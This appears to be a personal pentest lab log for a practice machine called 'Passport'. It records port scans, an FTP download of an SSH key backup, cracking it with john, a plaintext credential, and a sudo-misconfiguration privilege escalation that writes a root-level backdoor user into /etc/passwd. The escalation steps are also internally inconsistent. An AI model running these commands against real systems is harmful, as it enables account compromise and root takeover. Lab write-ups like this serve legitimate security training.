Passport
๐งช Pentest Log: {{date:2025-07-23}}
๐ Target Information
- Machine Name: Passport
- IP Address: 192.168.152.112
- Operating System: Linux
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 192.168.152.112 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 192.168.152.112 -oN tcp_scan_result.txt
nmap -sU --top-ports 100 192.168.152.112 -oN udp_scan_result.txt
Port 21
ftp luigi@192.168.152.112
get ssh.bak
Port 22
ssh -i ssh.bak luigi@192.168.152.112
Port 80
Web Content Enumeration
gobuster dir -u http://192.168.152.112 -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://192.168.152.112
wpscan -url http://192.168.152.112
dirsearch -u http://192.168.152.112 -r -o dirsearch.txt
luigi:Serendipity1903@
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 22
- Vulnerability Type: (e.g., RCE, LFI, SQLi, etc.) SSH
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
JohnTheRipper
ssh2john ssh.bak > ssh.hash
john ssh.hash --wordlist='/home/kali/Documents/oscp/rockyou.txt'
๐งฌ Privilege Escalation
๐ค Current Access
- User: luigi
- Groups: luigi
- Shell Type: (reverse shell / web shell / meterpreter / etc.) ssh
๐ Enumeration
SUID Binaries:
sudo -l
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: (e.g., Sudo Misconfig, SUID Abuse, Kernel Exploit) Sudo Misconfig
- Target Binary/Service: base64
- Reference / Source: (GTFOBins, ExploitDB, CVE, etc.) N/A
๐ง Exploit Steps
- create a malicious /tmp/base64 file
echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd
- Add executable privilege to /tmp/base64 file
chmod +x /tmp/base64
- Smash to root
sudo /tmp/base64 /home/*